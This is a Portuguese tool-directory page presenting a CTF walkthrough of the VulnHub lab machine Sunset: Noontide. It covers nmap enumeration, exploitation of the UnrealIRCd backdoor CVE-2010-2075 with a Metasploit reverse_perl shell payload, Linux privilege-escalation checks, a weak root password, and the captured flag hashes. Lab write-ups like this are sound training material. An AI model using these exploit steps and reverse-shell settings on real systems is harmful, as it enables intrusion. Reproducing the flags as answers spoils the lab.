Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
sunset-noontide-pentesting — Descrição Avaliação profissional de teste de penetração da máquina Sunset: Noontide do VulnHub, cobrindo reconhecimento, enumeração de serviços, exploração da CVE-2010-2075, pós-exploração, escalonamento de privilégios e comprometimento total do sistema. | Kitploit
Ferramentas/GitHubGitHub/zales2004/sunset-noontide-pentesting
Escalada de PrivilégiosReconhecimentoEscaneamento de PortasAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoSegurança de RedeCTFTestes de Penetração

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Aprendizado e Educação
Red Teaming
Labs e Prática
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

Descrição Avaliação profissional de teste de penetração da máquina Sunset: Noontide do VulnHub, cobrindo reconhecimento, enumeração de serviços, exploração da CVE-2010-2075, pós-exploração, escalonamento de privilégios e comprometimento total do sistema.

Ver Repositório
22há 20 diasAinda não revisado

Sunset: Noontide — Teste de Penetração

Uma avaliação profissional de teste de penetração e walkthrough de CTF da Sunset: Noontide, uma máquina intencionalmente vulnerável da VulnHub.

Este projeto documenta o ciclo de vida completo do teste de penetração, incluindo reconhecimento, enumeração de serviços, pesquisa de vulnerabilidades, exploração, acesso inicial, pós-exploração, escalonamento de privilégios, prova de comprometimento, avaliação de risco, mapeamento MITRE ATT&CK e remediação.

⚠️ Aviso: Esta avaliação foi realizada contra uma máquina intencionalmente vulnerável em um ambiente de laboratório autorizado. As técnicas e comandos documentados aqui destinam-se apenas a sistemas para os quais foi obtida autorização explícita.


🎯 Objetivos

  • Identificar o host alvo
  • Enumerar serviços expostos
  • Identificar software e versões vulneráveis
  • Pesquisar vulnerabilidades aplicáveis
  • Explorar o serviço vulnerável
  • Obter acesso inicial ao shell
  • Realizar enumeração de pós-exploração no Linux
  • Identificar oportunidades de escalonamento de privilégios
  • Obter acesso de nível root
  • Recuperar arquivos de prova de usuário e root
  • Documentar descobertas de segurança
  • Fornecer recomendações de remediação

🖥️ Ambiente de Laboratório

ComponenteDetalhes
AlvoSunset: Noontide
PlataformaVulnHub
IP do Alvo10.106.186.186
Nome do Host do Alvonoontide
SO do AlvoDebian GNU/Linux 10 (Buster)
Arquiteturax86_64
Plataforma do AtacanteKali Linux
IP do Atacante10.106.186.204
Tipo de AvaliaçãoAvaliação de Laboratório Autorizada
Risco GeralCRÍTICO
Resultado da AvaliaçãoComprometimento Total do Sistema

🔐 Cadeia de Ataque

Descoberta do Alvo → Enumeração Nmap → UnrealIRCd 3.2.8.1 Identificado → SearchSploit → CVE-2010-2075 Identificado → Exploração Metasploit → Shell de Comando Remoto → Shell como server → Pós-Exploração Linux → Credencial Root Fraca → su root → UID 0 / Acesso Root → Arquivos de Prova de Usuário e Root


1. Reconhecimento

A descoberta inicial de rede foi realizada para identificar o alvo vulnerável.

O alvo foi finalmente identificado como:

10.106.186.186

Durante o reconhecimento, 10.106.186.142 foi identificado como o gateway padrão, e não como o alvo pretendido.

Isso destaca a importância de identificar corretamente o alvo antes de realizar testes de segurança adicionais, particularmente em uma rede de laboratório em bridge ou compartilhada.


2. Enumeração de Serviços

A detecção de serviço e versão do Nmap foi realizada contra o alvo usando:

nmap -sV 10.106.186.186

O serviço exposto significativo identificado durante a avaliação foi:

6667/tcp open irc UnrealIRCd

Um scan mais detalhado foi então realizado usando:

nmap -sC -sV -Pn -p 6667 10.106.186.186

O serviço foi identificado como:

UnrealIRCd 3.2.8.1

O serviço IRC também reportou:

irc.foonet.com

O serviço UnrealIRCd exposto tornou-se a principal superfície de ataque investigada durante a avaliação.


3. Pesquisa de Vulnerabilidades

O SearchSploit foi usado para investigar vulnerabilidades documentadas publicamente associadas à versão do UnrealIRCd descoberta.

Comando:

searchsploit UnrealIRCd 3.2.8.1

O resultado relevante foi:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

A vulnerabilidade foi identificada como:

CVE-2010-2075

Vulnerabilidade

Execução de Comando por Backdoor no UnrealIRCd 3.2.8.1

Severidade

Crítica

Tipo de Ataque

Execução Remota de Comandos

Impacto de Segurança

A exploração bem-sucedida do serviço vulnerável permite que um atacante execute comandos remotamente no sistema alvo.


4. Exploração com Metasploit

O serviço IRC vulnerável foi explorado usando o Metasploit Framework.

O módulo selecionado foi:

exploit/unix/irc/unreal_ircd_3281_backdoor

Exemplo de configuração:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

As tentativas iniciais de payload não produziram uma sessão utilizável.

Um payload Unix reverse-Perl compatível foi subsequentemente selecionado:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

O Metasploit reportou que o alvo parecia vulnerável e abriu com sucesso uma sessão de shell de comando.


5. Acesso Inicial

O shell obtido foi verificado usando:

whoami

Resultado:

server

Isso confirmou a execução remota de comandos bem-sucedida como a conta server.

O diretório de trabalho inicial era:

/home/server/irc/Unreal3.2

Neste estágio, a avaliação progrediu da exploração remota de serviço para a enumeração local de pós-exploração.


6. Enumeração de Pós-Exploração

Após obter o shell, a enumeração padrão do Linux foi realizada para entender o host comprometido e identificar possíveis caminhos de escalonamento de privilégios.

Usuário Atual

Comando:

id

Resultado:

uid=1000(server) gid=1000(server)

A conta era um usuário não-root.

Nome do Host

Comando:

hostname

Resultado:

noontide

Informações do Kernel

Comando:

uname -a

Resultado:

Linux noontide 4.19.0-10-amd64 x86_64

Sistema Operacional

Comando:

cat /etc/os-release

Resultado:

Debian GNU/Linux 10 (buster)

Esses comandos estabeleceram a identidade atual, nome do host, versão do kernel, sistema operacional e configuração geral do sistema.


7. Enumeração de Escalonamento de Privilégios

Várias verificações padrão de escalonamento de privilégios no Linux foram realizadas.

7.1 Enumeração de SUID

Comando:

find / -perm -4000 -type f 2>/dev/null

Binários SUID padrão como passwd, chsh, mount, umount, su, chfn, newgrp e gpasswd foram identificados.

Nenhum binário SUID personalizado ou anômalo óbvio foi identificado como o vetor de escalonamento bem-sucedido.


7.2 Enumeração de Sudo

Comando:

sudo -l

Nenhum caminho útil de escalonamento de privilégios baseado em sudo foi identificado a partir da saída disponível.


7.3 Enumeração de Cron

Comandos:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

Os trabalhos agendados observados eram trabalhos de sistema padrão no estilo Debian.

Nenhum trabalho cron de root gravável óbvio foi identificado.


7.4 Enumeração de Arquivos Graváveis

Comando:

find / -writable -type f 2>/dev/null | head -100

Os resultados iniciais eram principalmente pseudo-arquivos /proc e não revelaram um vetor prático de escalonamento de privilégios.


7.5 Capacidades do Linux

Comando:

getcap -r / 2>/dev/null

Nenhum escalonamento de privilégios útil baseado em capacidades foi identificado a partir da saída resultante.


8. Escalonamento de Privilégios

O caminho bem-sucedido de escalonamento de privilégios foi baseado nas credenciais de root intencionalmente fracas configuradas na máquina vulnerável.

A conta root foi acessada usando:

su root

Senha:

root

O acesso root foi então verificado usando:

id

Resultado:

uid=0(root) gid=0(root) groups=0(root)

A identidade também foi confirmada usando:

whoami

Resultado:

root

Isso confirmou o controle administrativo completo do sistema alvo.


9. Prova de Comprometimento

9.1 Prova em Nível de Usuário

O arquivo de prova em nível de usuário estava localizado em:

/home/server/local.txt

Comando:

cat /home/server/local.txt

Resultado:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 Prova em Nível de Root

O arquivo de prova em nível de root estava localizado em:

/root/proof.txt

Comando:

cat /root/proof.txt

Resultado:

ab28c8ca8da1b9ffc2d702ac54221105

A prova de root também retornou:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

Baixar ferramenta